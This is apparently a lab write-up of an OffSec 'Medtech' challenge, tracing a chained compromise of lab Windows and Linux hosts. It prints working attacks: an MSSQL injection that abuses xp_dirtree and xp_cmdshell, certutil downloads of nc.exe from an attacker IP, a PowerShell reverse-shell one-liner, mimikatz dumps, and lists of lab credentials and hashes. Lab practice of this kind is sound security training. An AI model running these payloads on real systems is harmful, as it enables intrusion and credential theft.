Challenge 1 - Medtech

# Challenge 1 - Medtech * ![image](https://hackmd.io/_uploads/B1-tVNsxll.png) * ![image](https://hackmd.io/_uploads/H1udNEilee.png) ## 0x1 Recon ### Rustscan * 120 * ![image](https://hackmd.io/_uploads/rJ0J17oggl.png) * 121 * ![image](https://hackmd.io/_uploads/rkdX1migeg.png) * 122 * ![image](https://hackmd.io/_uploads/rJMU1Xixge.png) ### Nmap #### Internet * 192.168.115.120 * ![image](https://hackmd.io/_uploads/SyjxJ7jxll.png) * 121 * ![image](https://hackmd.io/_uploads/BkAFJQsgeg.png) * 122 * ![image](https://hackmd.io/_uploads/HJtDJ7ixee.png) #### Intranet * 172.16.115.10 (DC01) * ![image](https://hackmd.io/_uploads/SJqaZhczgg.png) * 172.16.115.11 (FILES02) * ![image](https://hackmd.io/_uploads/Bypxfh5Mel.png) * 172.16.115.12 (DEV04) * ![image](https://hackmd.io/_uploads/HktffhqMxx.png) * 172.16.115.13 (PROD01) * ![image](https://hackmd.io/_uploads/H1KVM3cGxx.png) * 172.16.115.14 (Linux?) * ![image](https://hackmd.io/_uploads/SkHIGnczlx.png) * 172.16.115.82 (CLIENT01) * ![image](https://hackmd.io/_uploads/rJ8KMhcMex.png) * 172.16.115.83 (CLIENT02) * ![image](https://hackmd.io/_uploads/rJmiz3qMee.png) ### Website * In 121 login page has sqli vulnerable * ![image](https://hackmd.io/_uploads/HJfwmmillx.png) ## 0x2 Shell as mssql(WEB02_121) * Got hash from `xp_dirtree` with `reponder`,but I can't crack it * ![image](https://hackmd.io/_uploads/B1__PdNGle.png) ```sql= 123';exec master..xp_dirtree '\\192.168.45.155\test';-- ``` ```sql= EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.249:8000/nc.exe C:\windows\temp\nc.exe'; EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.249 9005 -e cmd.exe';-- ``` * Run sqlmap * ![image](https://hackmd.io/_uploads/SydqPXslxl.png) * ![image](https://hackmd.io/_uploads/B122wmixge.png) ```bash= sqlmap -r req_121 --level 5 --risk 3 --batch --dbs -p ctl00%24ContentPlaceHolder1%24UsernameTextBox ``` * Got reverse shell * ![image](https://hackmd.io/_uploads/HJZB5Xjegg.png) * ![image](https://hackmd.io/_uploads/SkUUcXoeel.png) ```cmd= powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('192.168.45.187', 4444);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" ``` ```bash= rlwrap -cAr nc -lvnp 4444 ``` * Upload and running `tsh` * ![image](https://hackmd.io/_uploads/SyGe67sglg.png) ## 0x3 Shell as Administrator(WEB02_121) * Juicypotato success * ![image](https://hackmd.io/_uploads/HkvwR7oxle.png) * Use `mimikatz` got admin's hash * ![image](https://hackmd.io/_uploads/Hy94lVillg.png) * `administrator:b2c03054c306ac8fc5f9d188710b0168` ```powershell= PS> mimikatz.exe mimikatz # lsadump::sam ``` * Now we can connect winrm use admin's credential * ![image](https://hackmd.io/_uploads/H1hkW4ilxg.png) * Download `test.zip` in `joe` Downloads folder * ![image](https://hackmd.io/_uploads/B1MjZEjllx.png) * Found a sql credntial * ![image](https://hackmd.io/_uploads/rJkCWVolgl.png) * `sa:WhileChirpTuesday218` * Running `netstat` found 121 has connect to 172.16.138.*,this maybe useful * ![image](https://hackmd.io/_uploads/rJBzBVileg.png) * Found user `joe` password with `mimikatz` loginpasswords * ![image](https://hackmd.io/_uploads/rkZnjs9Geg.png) ## 0x4 Shell as offsec (VPN_122) * Login to 122 with `ssh` as offsec, password is `password` * `offsec:password` * ![image](https://hackmd.io/_uploads/ByBCTi9Mex.png) ## 0x5 Shell as root (VPN_122) * Use `openvpn` open a shell as root * ![image](https://hackmd.io/_uploads/ByHuCo9Mex.png) ## 0x6 Shell as joe (FILES02_11) * `joe:Flowers1` * ![image](https://hackmd.io/_uploads/HygKHnczxl.png) * Found another user credential in `fileMonitorBackup.log` * ![image](https://hackmd.io/_uploads/rJnSUh5fll.png) * ![image](https://hackmd.io/_uploads/rJcCH25Mgg.png) * ![image](https://hackmd.io/_uploads/Bycx8nqfxx.png) * ![image](https://hackmd.io/_uploads/BJrfInczlx.png) * ![image](https://hackmd.io/_uploads/r1sdU39Mgx.png) * `goomba:8e9e1516818ce4e54247e71e71b5f436` * `toad:5be63a865b65349851c1f11a067a3068` * `daisy:abf36048c1cf88f5603381c5128feb8e` * `wario:fdf36048c1cf88f5630381c5e38feb8e` * Only `wario` password can cracked, is `Mushroom!` * `wario:Mushroom!` ## 0x7 Shell as system (FILES02_11) * Upload `Juicypotato` & `nc` and run it * ![image](https://hackmd.io/_uploads/S1w6_3cGgx.png) * ![image](https://hackmd.io/_uploads/HkheK29fee.png) * Got admin hash from `mimikatz` * ![image](https://hackmd.io/_uploads/rJrq535Mee.png) * `Administrator:f1014ac49bae005ee3ece5f47547d185` ## 0x8 Shell as wario (CLIENT02_83) * Login to CLIENT02 as `wario` * ![image](https://hackmd.io/_uploads/BJYpGJifll.png) * ![image](https://hackmd.io/_uploads/HkdJQysMxe.png) * `wario:Mashroom!` ## 0x9 Shell as system (CLIENT02_83) * Follow the linpeas output, we found the file called `audittraker.exe` has Allaccess privilege to everyone * ![image](https://hackmd.io/_uploads/HJeGqkszlx.png) * So I covert to our malicious file, then use `sc.exe` start service, and got shell as system * ![image](https://hackmd.io/_uploads/rkiW31szll.png) * ![image](https://hackmd.io/_uploads/S1fM21oGll.png) * Dump hash with `mimikatz` * ![image](https://hackmd.io/_uploads/Hyhihyofgg.png) ## 0x10 Shell as system (CLIENT01_82) * Found another credential on CLIENT01 SMB * ![image](https://hackmd.io/_uploads/ry5G01ofex.png) * `yoshi:Mushroom!` * ![image](https://hackmd.io/_uploads/ByCP1xjzge.png) * Use `psexec.py` login as `yoshi` * ![image](https://hackmd.io/_uploads/rkDwxljMle.png) * ![image](https://hackmd.io/_uploads/BkiZZgsGxg.png) ## 0x11 Shell as yoshi (DEV04_12) * ![image](https://hackmd.io/_uploads/BJYFEljMex.png) * ![image](https://hackmd.io/_uploads/B1N0NeoGle.png) ## 0x12 Shell as administrator (DEV04_12) * `winpeas` shows the file in `C:\TEMP` has write permission for `yoshi` called `backup.exe`, and it will be schduled to execute * ![image](https://hackmd.io/_uploads/rkufvlifgx.png) * So I covert it to our malicious file, and got shell as admin * ![image](https://hackmd.io/_uploads/rybaFesMex.png) * ![image](https://hackmd.io/_uploads/H1dxcxofel.png) * Found user `leon` password with `mimikatz` * ![image](https://hackmd.io/_uploads/HykCqljzex.png) * `leon:rabbit:)` ## 0x13 Shell as leon (PROD01_13) * ![image](https://hackmd.io/_uploads/BJF2iliGee.png) * ![image](https://hackmd.io/_uploads/rJtSheozgx.png) ## 0x14 Shell as system (PROD01_13) * Upload the potato and nc, got shell as system * ![image](https://hackmd.io/_uploads/SJgSTgsMel.png) * Administrator hash from `mimikatz` * ![image](https://hackmd.io/_uploads/B14zRgjzgg.png) ## 0x15 Shell as system(DC01_10) * ![image](https://hackmd.io/_uploads/S15oAeiGxl.png) ## 0x16 Shell as offsec (WEB01_120) * ![image](https://hackmd.io/_uploads/HJXr1ZiGxg.png) * ![image](https://hackmd.io/_uploads/SyB6Jbjfxl.png) * `offsec/century6` ## 0x17 Shell as root (WEB01_120) * Using `sudo su` switch to `root` * ![image](https://hackmd.io/_uploads/SywQlZjfgl.png)